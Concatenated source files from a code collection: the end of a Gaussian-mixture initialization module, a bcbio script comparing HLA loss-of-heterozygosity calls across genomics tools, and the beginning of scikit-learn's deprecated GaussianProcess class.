    model = VariationalGaussianMixture(n_components)
    model.fit(points_data, points_test, patience=0)
    log_resp = model.predict_log_resp(points_data)
    return model.means, model.cov, model.log_weights, log_resp
def initialize_log_assignements(init,n_components,points_data,points_test=None,covariance_type="full"):
    """
    This method initializes the Variational Gaussian Mixture by giving the value
    of the responsibilities to the algorithm.

    Parameters
    ----------
    init : str
        The method with which the algorithm can be initialized.
        Must be in ['random','random_sk','plus','AF_KMC','kmeans','GMM','VBGMM']
    n_components : int
        the number of clusters
    points_data : an array (n_points,dim)
    covariance_type : str
        Type of covariance : 'full' or 'spherical'

    Other Parameters
    ----------------
    points_test : array (n_points_bis,dim) | Optional
        Initializes using early stopping in order to avoid over fitting.

    Returns
    -------
    log_assignements : an array (n_points,n_components)
        The log of the soft assignements according to the chosen method

    Raises
    ------
    ValueError
        If ``init`` is not one of the supported initialization names.
    """
    log_assignements = None
    assignements = None
    if init in ('random', 'plus', 'AF_KMC'):
        # These three methods only produce means; hard assignements are
        # derived from them with a single k-means E step.
        from .kmeans import Kmeans
        if init == 'random':
            means = initialization_random(n_components, points_data)
        elif init == 'plus':
            means = initialization_plus_plus(n_components, points_data)
        else:
            means = initialization_AF_KMC(n_components, points_data)
        km = Kmeans(n_components)
        km.means = means
        assignements = km._step_E(points_data)
    elif init == 'random_sk':
        assignements = initialization_random_sklearn(n_components, points_data)
    elif init == 'kmeans':
        _, assignements = initialization_k_means(n_components, points_data)
    elif init == 'GMM':
        _, _, _, log_assignements = initialization_GMM(n_components, points_data, points_test, covariance_type)
    elif init == 'VBGMM':
        _, _, _, log_assignements = initialization_VBGMM(n_components, points_data, points_test, covariance_type)
    else:
        # Bug fix: an unknown name used to fall through silently and crash
        # later with an UnboundLocalError; fail fast with a clear message.
        raise ValueError("Invalid value for 'init': %r" % (init,))
    if log_assignements is None:
        # Smooth hard/raw assignements so that log() never sees a zero.
        epsilon = np.finfo(assignements.dtype).eps
        assignements += epsilon
        assignements /= 1 + n_components * epsilon
        log_assignements = np.log(assignements)
    return log_assignements
def initialize_mcw(init,n_components,points_data,points_test=None,covariance_type="full"):
    """
    This method initializes the Variational Gaussian Mixture by setting the values
    of the means, the covariances and the log of the weights.

    Parameters
    ----------
    init : str
        The method with which the algorithm can be initialized.
        Must be in ['random','plus','AF_KMC','kmeans','GMM','VBGMM']
    n_components : int
        the number of clusters
    points_data : an array (n_points,dim)
    covariance_type : str
        Type of covariance : 'full' or 'spherical'

    Other Parameters
    ----------------
    points_test : array (n_points_bis,dim) | Optional
        Initializes using early stopping in order to avoid over fitting.

    Returns
    -------
    means : an array (n_components,dim)
        The initial means computed
    cov : an array (n_components,dim,dim)
        The initial covariances computed
    log_weights : an array (n_components,)
        The initial weights (log) computed

    Raises
    ------
    ValueError
        If ``init`` or ``covariance_type`` is not a supported value.
    """
    n_points,dim = points_data.shape
    # Uniform initial weights, stored as logs.
    log_weights = - np.log(n_components) * np.ones(n_components)
    # Warning : the algorithm is very sensitive to these first covariances given
    if covariance_type == "full":
        cov_init = np.cov(points_data.T)
        cov = np.tile(cov_init, (n_components,1,1))
    elif covariance_type == "spherical":
        cov_init = np.var(points_data, axis=0, ddof=1).mean()
        cov = cov_init * np.ones(n_components)
    else:
        # Bug fix: an unknown covariance type used to leave 'cov' unbound
        # and crash later with a NameError on the means-only init paths.
        raise ValueError("Invalid value for 'covariance_type': %r" % (covariance_type,))
    if init == "random":
        means = initialization_random(n_components,points_data)
    elif init == "plus":
        means = initialization_plus_plus(n_components,points_data)
    elif init == "AF_KMC":
        means = initialization_AF_KMC(n_components,points_data)
    elif init == "kmeans":
        means,_ = initialization_k_means(n_components,points_data)
    elif init == "GMM":
        means,cov,log_weights,_ = initialization_GMM(n_components,points_data,points_test,covariance_type)
    elif init == "VBGMM":
        means,cov,log_weights,_ = initialization_VBGMM(n_components,points_data,points_test,covariance_type)
    else:
        # Bug fix: an unknown init used to fall through and crash with a
        # NameError on 'means' at the return statement.
        raise ValueError("Invalid value for 'init': %r" % (init,))
    return means,cov,log_weights
"Gaussian"
] | 9789e914be091f19805b4196d1a9700ad07b58686b7bfda945cf02efe98195f0 |
#!/usr/bin/env python
"""Run LOH heterogeneity comparison amongst mutiple methods, focusing on HLA.
Includes LOHHLA with inputs from a bcbio OptiType hg38, PureCN, TitanCNA Cromwell run.
Requires:
- pdftoppm (from poppler-utils) for plot generation from pdfs
"""
from __future__ import print_function
import collections
import csv
import glob
import StringIO as io
import os
import shutil
import subprocess
import sys
import yaml
from bcbio.pipeline import alignment
from bcbio import utils
# Glob (relative to the Cromwell work dir) locating HLA typing call outputs.
HLA_GLOB="call-call_hla/shard-*/execution"
# Glob locating structural variant calling execution directories.
SV_GLOB="call-svcall/shard-*/wf-svcall.cwl/*/call-detect_sv/execution"
# Per-sample/per-method structural variant output files; formatted with
# sample, method and ext before globbing.
SVCALL_GLOB="structural/{sample}/{method}/*{ext}"
# Path to a local LOHHLA checkout (provides LOHHLAscript.R and data/hla.dat).
LOHHLA="../lohhla/lohhla"
# Aligner used to map HLA reads for LOHHLA input.
ALIGNER="novoalign"
# Minimum coverage passed to LOHHLA's --minCoverageFilter.
DEPTH_FILTER=5
# hg38 coordinates for HLA region https://www.ncbi.nlm.nih.gov/grc/human/regions/MHC
hla_coords = ("chr6", 28510120, 33480577)
def run_sample(tumor, normal, work_dir, cromwell_dir, hla_fa):
    """Run LOHHLA for one tumor/normal pair and compare against CNV callers.

    Prepares HLA reference and per-sample BAMs from a bcbio Cromwell run,
    invokes LOHHLA (skipped when its output already exists), then prints a
    comparison of LOH calls across methods via compare_calls.

    prep_hla_ref, get_hla, get_data, prep_ploidy, prep_hla,
    create_tumor_bamdir and prep_bam_inputs are helpers defined elsewhere
    in this file.
    """
    hla_fasta, hlas = prep_hla_ref(hla_fa, work_dir)
    hla_cromwell_dir = _get_cromwell_execution_dir(cromwell_dir, HLA_GLOB)
    sv_cromwell_dir = _get_cromwell_execution_dir(cromwell_dir, SV_GLOB)
    # Realign each sample's HLA reads against the HLA-only reference.
    tumor_fastq, tumor_calls_orig = get_hla(tumor, hla_cromwell_dir, HLA_GLOB)
    tumor_bam = alignment.align_to_sort_bam(tumor_fastq, None, ALIGNER, get_data(tumor, hla_fasta, work_dir))["work_bam"]
    normal_fastq, normal_calls_orig = get_hla(normal, hla_cromwell_dir, HLA_GLOB)
    normal_bam = alignment.align_to_sort_bam(normal_fastq, None, ALIGNER, get_data(normal, hla_fasta, work_dir))["work_bam"]
    tumor_ploidy = prep_ploidy(work_dir, tumor, tumor_bam, sv_cromwell_dir, os.path.join(SV_GLOB, SVCALL_GLOB))
    # NOTE(review): both calls use normal_calls_orig -- presumably LOHHLA
    # wants the germline HLA typing for tumor and normal alike; confirm.
    tumor_calls = prep_hla(work_dir, tumor, normal_calls_orig, hlas, normal_bam, tumor_bam)
    normal_calls = prep_hla(work_dir, normal, normal_calls_orig, hlas, normal_bam, tumor_bam)
    bam_dir, normal_bam_ready = create_tumor_bamdir(tumor, tumor_bam, normal_bam, work_dir)
    out_dir = utils.safe_makedir(os.path.join(work_dir, tumor, "lohhla_out"))
    prep_bam_inputs(out_dir, tumor, tumor_calls, tumor_bam)
    prep_bam_inputs(out_dir, normal, normal_calls, normal_bam)
    lohhla_output = os.path.join(out_dir, "%s.%s.DNA.HLAlossPrediction_CI.xls" % (tumor, DEPTH_FILTER))
    cmd = ["Rscript", os.path.join(LOHHLA, "LOHHLAscript.R"),
           "--patientId", tumor, "--outputDir", out_dir,
           "--normalBAMfile", normal_bam_ready, "--BAMDir", bam_dir,
           "--hlaPath", normal_calls, "--HLAfastaLoc", hla_fasta,
           "--HLAexonLoc", os.path.join(LOHHLA, "data", "hla.dat"),
           "--CopyNumLoc", tumor_ploidy,
           "--mappingStep", "FALSE",
           "--minCoverageFilter", str(DEPTH_FILTER)]
    # LOHHLA is expensive; only run when the prediction file is missing.
    if not os.path.exists(lohhla_output):
        subprocess.check_call(cmd)
    compare_calls(tumor, lohhla_output, sv_cromwell_dir, os.path.join(SV_GLOB, SVCALL_GLOB))
def _create_plot(tumor, in_glob, out_ext, page=1):
    """Render one page of the first PDF matching *in_glob* as a PNG.

    The PNG lands in the images/ directory as <tumor>-<out_ext>.png and is
    only generated when missing. Requires pdftoppm (poppler-utils).
    """
    image_dir = utils.safe_makedir("images")
    out_base = os.path.join(image_dir, "%s-%s" % (tumor, out_ext))
    pdf_file = glob.glob(in_glob)[0]
    if not os.path.exists(out_base + ".png"):
        args = ["pdftoppm", pdf_file, out_base, "-png", "-f", page, "-singlefile"]
        # page may be an int, so stringify every argument.
        subprocess.check_call([str(a) for a in args])
    return out_base + ".png"
def _get_loh_from_calls(calls):
if calls["loh"]:
return "mixed LOH" if calls["std"] else "LOH"
else:
return "no LOH"
def _compare_lohhla(lohhla_output):
    """Print LOHHLA predictions for each unique HLA-A allele pair and
    summarize them into an LOH verdict (PVal_unique < 0.01 counts as loss).
    """
    print("#### LOHHLA")
    print("```")
    reported = set([])
    calls = collections.defaultdict(int)
    show_cols = ["PVal_unique", "HLA_A_type1", "HLA_A_type2",
                 "HLA_type1copyNum_withBAFBin", "HLA_type2copyNum_withBAFBin"]
    with open(lohhla_output) as in_handle:
        header = in_handle.readline().strip().split("\t")
        for line in in_handle:
            vals = dict(zip(header, line.strip().split("\t")))
            allele_pair = (vals["HLA_A_type1"], vals["HLA_A_type2"])
            # Only display each allele pair once, but count every row.
            if allele_pair not in reported:
                print([vals[c] for c in show_cols])
                reported.add(allele_pair)
            if float(vals["PVal_unique"]) < 0.01:
                calls["loh"] += 1
            else:
                calls["std"] += 1
    print("```")
    return _get_loh_from_calls(calls)
def _compare_purecn(tumor, cromwell_dir, sv_glob):
    """Print PureCN purity/ploidy plus its copy-number segments overlapping
    the HLA region, and return an LOH verdict (minor copy number 0 = loss).
    """
    print("#### PureCN")
    calls = collections.defaultdict(int)
    pure_base_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="purecn", ext="-purecn.csv"))
    pure_cn_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="purecn", ext="loh.csv"))
    cov_plot = _create_plot(tumor, os.path.join(os.path.dirname(pure_cn_file), "%s*-purecn.pdf" % tumor), "purecn", 2)
    sun_plot = _create_plot(tumor, os.path.join(os.path.dirname(pure_cn_file), "%s*-purecn_local_optima.pdf" % tumor),
                            "purecn-sunrise")
    # First two lines of the base file are a quoted CSV header and values.
    with open(pure_base_file) as in_handle:
        vals = dict(zip(in_handle.readline().strip().replace('"', '').split(","),
                        in_handle.readline().strip().split(",")))
    print()
    print("| | |")
    print("| --- | --- |")
    print("| purity | %s |" % vals["Purity"])
    print("| ploidy | %s |" % vals["Ploidy"])
    print("```")
    with open(pure_cn_file) as in_handle:
        in_handle.readline()  # header
        for line in in_handle:
            _, chrom, start, end, _, cn, minor_cn = line.split(",")[:7]
            start = int(start)
            end = int(end)
            if chrom == hla_coords[0] and are_overlapping((start, end), hla_coords[1:]):
                print(line.strip().split(",")[1:])
                # Minor copy number 0 over the HLA region means LOH.
                if int(minor_cn) == 0:
                    calls["loh"] += 1
                else:
                    calls["std"] += 1
    print("```")
    # NOTE(review): these format strings look truncated (probably markdown
    # image links lost in transit) -- "" % (tuple) raises TypeError; confirm
    # against the original source.
    print("" % (tumor, cov_plot))
    print("" % (tumor, sun_plot))
    return _get_loh_from_calls(calls)
def _compare_titancna(tumor, cromwell_dir, sv_glob):
    """Print TitanCNA purity/ploidy plus segments overlapping the HLA
    region, and return an LOH verdict (MinorCN 0 = loss).
    """
    print("#### TitanCNA")
    calls = collections.defaultdict(int)
    titancna_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="titancna", ext="Clusters.txt"))
    with open(titancna_file) as in_handle:
        vals = dict(zip(in_handle.readline().strip().split("\t"), in_handle.readline().strip().split("\t")))
    # Remap the absolute solution path recorded by TitanCNA onto the local
    # Cromwell directory layout.
    path = vals["path"]
    init_dir, check_dir = os.path.dirname(titancna_file).split("/", 1)
    rel_path = init_dir + "/" + path[path.find(check_dir):]
    print()
    print("| | |")
    print("| --- | --- |")
    print("| purity | %s |" % vals["purity"])
    print("| ploidy | %s |" % vals["ploidy"])
    cna_plot = _create_plot(tumor, os.path.join(rel_path, "%s*_CNA.pdf" % tumor), "titan-cna")
    loh_plot = _create_plot(tumor, os.path.join(rel_path, "%s*_LOH.pdf" % tumor), "titan-loh")
    seg_file = rel_path + ".segs.txt"
    out_keys = ["Chromosome", "Start_Position.bp.", "End_Position.bp.", "Copy_Number",
                "MinorCN", "MajorCN", "TITAN_call"]
    print("```")
    with open(seg_file) as in_handle:
        header = in_handle.readline().strip().split()
        for line in in_handle:
            val = dict(zip(header, line.strip().split()))
            start = int(val["Start_Position.bp."])
            end = int(val["End_Position.bp."])
            if val["Chromosome"] == hla_coords[0] and are_overlapping((start, end), hla_coords[1:]):
                print([val[k] for k in out_keys])
                # Minor copy number 0 over the HLA region means LOH.
                if int(val["MinorCN"]) == 0:
                    calls["loh"] += 1
                else:
                    calls["std"] += 1
    print("```")
    # NOTE(review): format strings appear truncated (likely lost markdown
    # image links) -- "" % (tuple) raises TypeError; confirm original source.
    print("" % (tumor, cna_plot))
    print("" % (tumor, loh_plot))
    return _get_loh_from_calls(calls)
def _compare_gatkcnv(tumor, cromwell_dir, sv_glob):
    """Report GATK CNV segment calls overlapping the HLA region.

    Prints matching segment lines plus the copy number model plot.
    Unlike the other callers this returns no LOH summary: the GATK CNV
    ``-call.seg`` output here carries no minor allele copy number to count.
    """
    print("#### GATK CNV")
    gatk_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="gatk-cnv", ext="-call.seg"))
    orig_model_file = gatk_file.replace("-call.seg", ".modeled.png")
    model_file = os.path.join("images", os.path.basename(orig_model_file))
    shutil.copy(orig_model_file, model_file)
    print("```")
    with open(gatk_file) as in_handle:
        for line in in_handle:
            # Skip SAM-style '@' header lines in the .seg output.
            if not line.startswith("@"):
                chrom, start, end = line.split()[:3]
                if chrom == hla_coords[0] and are_overlapping((int(start), int(end)), hla_coords[1:]):
                    print(line.strip())
    print("```")
    # Bug fix: ``"" % (tumor, model_file)`` raises TypeError; emit the
    # intended markdown image link instead.
    print("![%s](%s)" % (tumor, model_file))
def compare_calls(tumor, lohhla_output, cromwell_dir, sv_glob):
    """Compare HLA LOH calls across callers for one tumor sample.

    Runs each per-caller comparison with stdout captured, then prints a
    markdown summary table followed by the captured per-caller detail.
    """
    summary = collections.OrderedDict()
    print("### %s" % tumor)
    orig_stdout = sys.stdout
    sys.stdout = io.StringIO()
    try:
        summary["LOHHLA"] = _compare_lohhla(lohhla_output)
        summary["PureCN"] = _compare_purecn(tumor, cromwell_dir, sv_glob)
        summary["TitanCNA"] = _compare_titancna(tumor, cromwell_dir, sv_glob)
    finally:
        # Always restore the real stdout, even if a comparison fails midway.
        saved_stdout = sys.stdout
        sys.stdout = orig_stdout
    print()
    print("| | |")
    print("| --- | --- |")
    for k, v in summary.items():
        print("| %s | %s |" % (k, v))
    # Emit the captured per-caller detail after the summary table.
    sys.stdout.write(saved_stdout.getvalue())
    # print("#### CNVkit")
    # cnvkit_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=tumor, method="cnvkit", ext="-call.cns"))
    # out_keys = ["chromosome", "start", "end", "cn", "cn1", "cn2"]
    # print("```")
    # with open(cnvkit_file) as in_handle:
    #     header = in_handle.readline().strip().split()
    #     for line in in_handle:
    #         chrom, start, end = line.split()[:3]
    #         if chrom == hla_coords[0] and are_overlapping((int(start), int(end)), hla_coords[1:]):
    #             vals = dict(zip(header, line.strip().split()))
    #             print([vals[k] for k in out_keys])
    # print("```")
    # Bug fix: a bare ``print`` is a no-op expression in Python 3; call it
    # to emit the intended trailing blank line.
    print()
def are_overlapping(r, s):
    """Return True when closed intervals *r* and *s* share any point.

    https://stackoverflow.com/a/27182551
    """
    r_start, r_end = r[0], r[1]
    s_start, s_end = s[0], s[1]
    # Intervals are disjoint only when one ends before the other starts.
    return not (r_end < s_start or s_end < r_start)
def _get_cromwell_file(cromwell_dir, file_glob, kwargs):
fglob = os.path.join(cromwell_dir, file_glob.format(**kwargs))
fs = glob.glob(fglob)
assert len(fs) == 1, (fglob, fs)
return fs[0]
def _get_cromwell_execution_dir(base_dir, target_glob):
    """Retrieve the baseline directory with cromwell output files.

    Handles Cromwell restarts where there are multiple work directories and
    we traverse symlinks back to the original.
    """
    cur_dir = glob.glob(os.path.join(base_dir, target_glob))[0]
    if os.path.exists(os.path.join(cur_dir, "cwl.output.json")):
        # Outputs were produced here, so this run's directory is the live one.
        return base_dir
    else:
        # Restarted run: the 'script' file is a symlink into the original
        # execution directory; recover that run's GUID and recurse into it.
        symlink_dir = os.path.dirname(os.path.realpath(os.path.join(cur_dir, "script")))
        ref_base = os.path.dirname(base_dir)
        new_guid = symlink_dir[symlink_dir.find(ref_base) + len(ref_base) + 1:].split("/")[0]
        return _get_cromwell_execution_dir(os.path.join(ref_base, new_guid), target_glob)
def prep_bam_inputs(out_dir, sample, call_file, bam_file):
    """Prepare expected input BAM files from pre-aligned.

    For each HLA name listed (one per line) in ``call_file``, extracts reads
    mapped to that contig into ``<out_dir>/<base>/<base>.type.<hla>.filtered.bam``,
    skipping outputs that already exist.
    """
    base = utils.splitext_plus(os.path.basename(bam_file))[0]
    with open(call_file) as in_handle:
        for cur_hla in (x.strip() for x in in_handle):
            out_file = os.path.join(utils.safe_makedir(os.path.join(out_dir, base)),
                                    "%s.type.%s.filtered.bam" % (base, cur_hla))
            if not os.path.exists(out_file):
                # samtools view -b <bam> <region> subsets reads on one contig
                cmd = ["samtools", "view", "-b","-o", out_file, bam_file, cur_hla]
                subprocess.check_call(cmd)
def create_tumor_bamdir(tumor, tumor_bam, normal_bam, work_dir):
    """Create expected input directory with tumor/normal BAMs in one place.

    Symlinks both BAMs into ``<work_dir>/<tumor>/in_bams`` and returns the
    directory plus the linked normal BAM path.
    """
    bam_dir = utils.safe_makedir(os.path.join(work_dir, tumor, "in_bams"))
    linked = {}
    for orig_bam in (normal_bam, tumor_bam):
        ready = os.path.join(bam_dir, os.path.basename(orig_bam))
        utils.symlink_plus(orig_bam, ready)
        linked[orig_bam] = ready
    return bam_dir, linked[normal_bam]
def get_data(sample, hla_fasta, work_dir):
    """Build the minimal bcbio data dictionary needed for HLA realignment."""
    config = {"analysis": "variant",
              # Report all equally-scoring alignments (up to 9999 locations)
              "algorithm": {"multiple_mappers": "All 9999"},
              "resources": {"novoalign": {"options": ["-R", "0"]}}}
    reference = {"bwa": {"indexes": hla_fasta + ".bwt"},
                 "novoalign": {"indexes": [hla_fasta + ".ndx"]}}
    rgnames = {"sample": sample, "rg": sample, "pl": "illumina",
               "pu": sample, "lane": sample}
    return {"dirs": {"work": work_dir},
            "config": config,
            "reference": reference,
            "rgnames": rgnames}
def get_hla(sample, cromwell_dir, hla_glob):
    """Retrieve HLA calls and input fastqs for a sample.
    """
    pattern = os.path.join(cromwell_dir, hla_glob, "align", sample, "hla")
    hla_dir = glob.glob(pattern)[0]
    fastq = os.path.join(hla_dir, "OptiType-HLA-A_B_C-input.fq")
    calls = os.path.join(hla_dir, "%s-optitype.csv" % sample)
    return fastq, calls
def name_to_absolute(x):
    """Convert standard hg38 HLA name into ABSOLUTE naming.

    Replaces the '-', '*' and ':' separators with underscores and
    lowercases the result (e.g. ``HLA-A*02:01`` -> ``hla_a_02_01``).
    """
    return x.translate(str.maketrans("-*:", "___")).lower()
def get_hla_choice(h, hlas, normal_bam, tumor_bam):
    """Retrieve matching HLA with best read support in both tumor and normal.

    Candidates must start with prefix ``h`` and have at least one mapped
    read in both BAMs; the one with the most normal reads wins.
    """
    def get_counts(bam_file):
        # samtools idxstats columns: name, seq length, mapped, unmapped
        counts = {}
        # Bug fix: check_output returns bytes on Python 3; decode before
        # splitting on the newline string.
        out = subprocess.check_output(["samtools", "idxstats", bam_file]).decode()
        for line in out.split("\n"):
            if line.startswith(h):
                name, _, count, _ = line.split()
                counts[name] = int(count)
        return counts
    tcounts = get_counts(tumor_bam)
    ncounts = get_counts(normal_bam)
    check_hlas = [x for x in hlas if x.startswith(h) and tcounts.get(x, 0) > 0 and ncounts.get(x, 0) > 0]
    cur_hlas = sorted(check_hlas, key=lambda x: ncounts[x], reverse=True)
    #print(cur_hlas[0], tcounts.get(cur_hlas[0]), ncounts.get(cur_hlas[0]))
    return cur_hlas[0]
def prep_hla(work_dir, sample, calls, hlas, normal_bam, tumor_bam):
    """Convert HLAs into ABSOLUTE format for use with LOHHLA.

    LOHHLA hard codes names to hla_a, hla_b, hla_c so need to move.
    Writes one chosen allele name per line to ``<sample>-hlas.txt``
    and returns that path.
    """
    work_dir = utils.safe_makedir(os.path.join(work_dir, sample, "inputs"))
    hla_file = os.path.join(work_dir, "%s-hlas.txt" % sample)
    with open(calls) as in_handle:
        with open(hla_file, "w") as out_handle:
            next(in_handle)  # skip the optitype CSV header row
            for line in in_handle:
                # Third CSV column holds the two alleles joined by ';'
                _, _, a, _, _ = line.strip().split(",")
                a1, a2 = a.split(";")
                out_handle.write(get_hla_choice(name_to_absolute(a1), hlas, normal_bam, tumor_bam) + "\n")
                out_handle.write(get_hla_choice(name_to_absolute(a2), hlas, normal_bam, tumor_bam) + "\n")
    return hla_file
def prep_ploidy(work_dir, sample, bam_file, cromwell_dir, sv_glob):
    """Create LOHHLA compatible input ploidy file from PureCN output.

    Writes ``<sample>-solutions.txt`` with purity/ploidy estimates and
    returns its path.
    """
    purecn_file = _get_cromwell_file(cromwell_dir, sv_glob, dict(sample=sample, method="purecn", ext="purecn.csv"))
    work_dir = utils.safe_makedir(os.path.join(work_dir, sample, "inputs"))
    out_file = os.path.join(work_dir, "%s-solutions.txt" % sample)
    with open(purecn_file) as in_handle:
        reader = csv.reader(in_handle)
        # PureCN csv: header row followed by a single stats row
        purecn_stats = dict(zip(next(reader), next(reader)))
    with open(out_file, "w") as out_handle:
        out_handle.write("Ploidy\ttumorPurity\ttumorPloidy\n")
        # LOHHLA keys the solutions table by the BAM file's basename
        lohhla_name = utils.splitext_plus(os.path.basename(bam_file))[0]
        # NOTE(review): the row has 4 fields against 3 header columns --
        # presumably the first field is a row name for LOHHLA's reader;
        # confirm against the LOHHLA input format.
        out_handle.write("%s\t%s\t%s\t%s\n" % (lohhla_name, purecn_stats["Ploidy"],
                                               purecn_stats["Purity"], purecn_stats["Ploidy"]))
    return out_file
def prep_hla_ref(hla_fasta, work_dir):
    """Prepare a deduplicated HLA FASTA with ABSOLUTE-style names and indexes.

    Renames each sequence via ``name_to_absolute`` on the second header
    token, drops duplicate names, builds bwa and novoalign indexes when
    missing, and returns the FASTA path plus the list of sequence names.
    """
    work_dir = utils.safe_makedir(os.path.join(work_dir, "hlaref"))
    out_file = os.path.join(work_dir, os.path.basename(hla_fasta))
    seen_names = set([])
    if not utils.file_uptodate(out_file, hla_fasta):
        with open(hla_fasta) as in_handle:
            with open(out_file, "w") as out_handle:
                for line in in_handle:
                    if line.startswith(">"):
                        # The second header token carries the HLA allele name
                        cur_name = name_to_absolute(line.strip().split()[1])
                        if cur_name not in seen_names:
                            out_handle.write(">%s\n" % cur_name)
                            seen_names.add(cur_name)
                            write_seq = True
                        else:
                            write_seq = False
                    # NOTE(review): assumes the FASTA starts with a '>' header;
                    # otherwise write_seq is referenced before assignment.
                    elif write_seq:
                        out_handle.write(line)
    if not os.path.exists(out_file + ".bwt"):
        subprocess.check_call(["bwa", "index", out_file])
    if not os.path.exists(out_file + ".ndx"):
        subprocess.check_call(["novoindex", out_file + ".ndx", out_file])
    hlas = []
    with open(out_file) as in_handle:
        for line in in_handle:
            if line.startswith(">"):
                hlas.append(line[1:].strip())
    return out_file, hlas
def samples_from_config(sample_yaml):
    """Yield (tumor, normal) sample descriptions per batch from a bcbio config."""
    with open(sample_yaml) as in_handle:
        config = yaml.safe_load(in_handle)
    by_batch = collections.defaultdict(dict)
    for sample in config["details"]:
        meta = sample["metadata"]
        by_batch[meta["batch"]][meta["phenotype"]] = sample["description"]
    for batch_id in sorted(by_batch.keys()):
        batch = by_batch[batch_id]
        yield batch["tumor"], batch["normal"]
if __name__ == "__main__":
    # Usage: script.py <bcbio sample YAML> <HLA fasta> <cromwell work dir>
    sample_config, hla_fa, cromwell_dir = sys.argv[1:]
    work_dir = utils.safe_makedir(os.path.join(os.getcwd(), "work_lohhla"))
    # Process batches in sorted tumor order for stable report output
    for t, n in sorted(samples_from_config(sample_config)):
        run_sample(t, n, work_dir, cromwell_dir, hla_fa)
| a113n/bcbio-nextgen | scripts/utils/hla_loh_comparison.py | Python | mit | 17,689 | [
"BWA"
] | 918c99450c3d5848627fc22ea6852df1890c0350a638c89216073111f901d20c |
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# Licence: BSD 3 clause
from __future__ import print_function
import numpy as np
from scipy import linalg, optimize
from ..base import BaseEstimator, RegressorMixin
from ..metrics.pairwise import manhattan_distances
from ..utils import check_random_state, check_array, check_X_y
from ..utils.validation import check_is_fitted
from . import regression_models as regression
from . import correlation_models as correlation
from ..utils import deprecated
MACHINE_EPSILON = np.finfo(np.double).eps
@deprecated("l1_cross_distances is deprecated and will be removed in 0.20.")
def l1_cross_distances(X):
    """
    Computes the nonzero componentwise L1 cross-distances between the vectors
    in X.

    Parameters
    ----------
    X: array_like
        An array with shape (n_samples, n_features)

    Returns
    -------
    D: array with shape (n_samples * (n_samples - 1) / 2, n_features)
        The array of componentwise L1 cross-distances.

    ij: arrays with shape (n_samples * (n_samples - 1) / 2, 2)
        The indices i and j of the vectors in X associated to the cross-
        distances in D: D[k] = np.abs(X[ij[k, 0]] - X[ij[k, 1]]).
    """
    X = check_array(X)
    n_samples, n_features = X.shape
    n_nonzero_cross_dist = n_samples * (n_samples - 1) // 2
    # Use the builtin ``int`` dtype: ``np.int`` was a deprecated alias for
    # it and is removed in NumPy >= 1.24.
    ij = np.zeros((n_nonzero_cross_dist, 2), dtype=int)
    D = np.zeros((n_nonzero_cross_dist, n_features))
    ll_1 = 0
    for k in range(n_samples - 1):
        # Fill all pairs (k, k+1..n_samples-1) in one vectorized slice.
        ll_0 = ll_1
        ll_1 = ll_0 + n_samples - k - 1
        ij[ll_0:ll_1, 0] = k
        ij[ll_0:ll_1, 1] = np.arange(k + 1, n_samples)
        D[ll_0:ll_1] = np.abs(X[k] - X[(k + 1):n_samples])
    return D, ij
@deprecated("GaussianProcess is deprecated and will be removed in 0.20. "
"Use the GaussianProcessRegressor instead.")
class GaussianProcess(BaseEstimator, RegressorMixin):
"""The legacy Gaussian Process model class.
Note that this class is deprecated and will be removed in 0.20.
Use the GaussianProcessRegressor instead.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
regr : string or callable, optional
A regression function returning an array of outputs of the linear
regression functional basis. The number of observations n_samples
should be greater than the size p of this basis.
Default assumes a simple constant regression trend.
Available built-in regression models are::
'constant', 'linear', 'quadratic'
corr : string or callable, optional
A stationary autocorrelation function returning the autocorrelation
between two points x and x'.
Default assumes a squared-exponential autocorrelation model.
Built-in correlation models are::
'absolute_exponential', 'squared_exponential',
'generalized_exponential', 'cubic', 'linear'
beta0 : double array_like, optional
The regression weight vector to perform Ordinary Kriging (OK).
Default assumes Universal Kriging (UK) so that the vector beta of
regression weights is estimated using the maximum likelihood
principle.
storage_mode : string, optional
A string specifying whether the Cholesky decomposition of the
correlation matrix should be stored in the class (storage_mode =
'full') or not (storage_mode = 'light').
Default assumes storage_mode = 'full', so that the
Cholesky decomposition of the correlation matrix is stored.
This might be a useful parameter when one is not interested in the
MSE and only plan to estimate the BLUP, for which the correlation
matrix is not required.
verbose : boolean, optional
A boolean specifying the verbose level.
Default is verbose = False.
theta0 : double array_like, optional
An array with shape (n_features, ) or (1, ).
The parameters in the autocorrelation model.
If thetaL and thetaU are also specified, theta0 is considered as
the starting point for the maximum likelihood estimation of the
best set of parameters.
Default assumes isotropic autocorrelation model with theta0 = 1e-1.
thetaL : double array_like, optional
An array with shape matching theta0's.
Lower bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
thetaU : double array_like, optional
An array with shape matching theta0's.
Upper bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
normalize : boolean, optional
Input X and observations y are centered and reduced wrt
means and standard deviations estimated from the n_samples
observations provided.
Default is normalize = True so that data is normalized to ease
maximum likelihood estimation.
nugget : double or ndarray, optional
Introduce a nugget effect to allow smooth predictions from noisy
data. If nugget is an ndarray, it must be the same length as the
number of data points used for the fit.
The nugget is added to the diagonal of the assumed training covariance;
in this way it acts as a Tikhonov regularization in the problem. In
the special case of the squared exponential correlation function, the
nugget mathematically represents the variance of the input values.
Default assumes a nugget close to machine precision for the sake of
robustness (nugget = 10. * MACHINE_EPSILON).
optimizer : string, optional
A string specifying the optimization algorithm to be used.
Default uses 'fmin_cobyla' algorithm from scipy.optimize.
Available optimizers are::
'fmin_cobyla', 'Welch'
'Welch' optimizer is dued to Welch et al., see reference [WBSWM1992]_.
It consists in iterating over several one-dimensional optimizations
instead of running one single multi-dimensional optimization.
random_start : int, optional
The number of times the Maximum Likelihood Estimation should be
performed from a random starting point.
The first MLE always uses the specified starting point (theta0),
the next starting points are picked at random according to an
exponential distribution (log-uniform on [thetaL, thetaU]).
Default does not use random starting point (random_start = 1).
random_state: integer or numpy.RandomState, optional
The generator used to shuffle the sequence of coordinates of theta in
the Welch optimizer. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
Attributes
----------
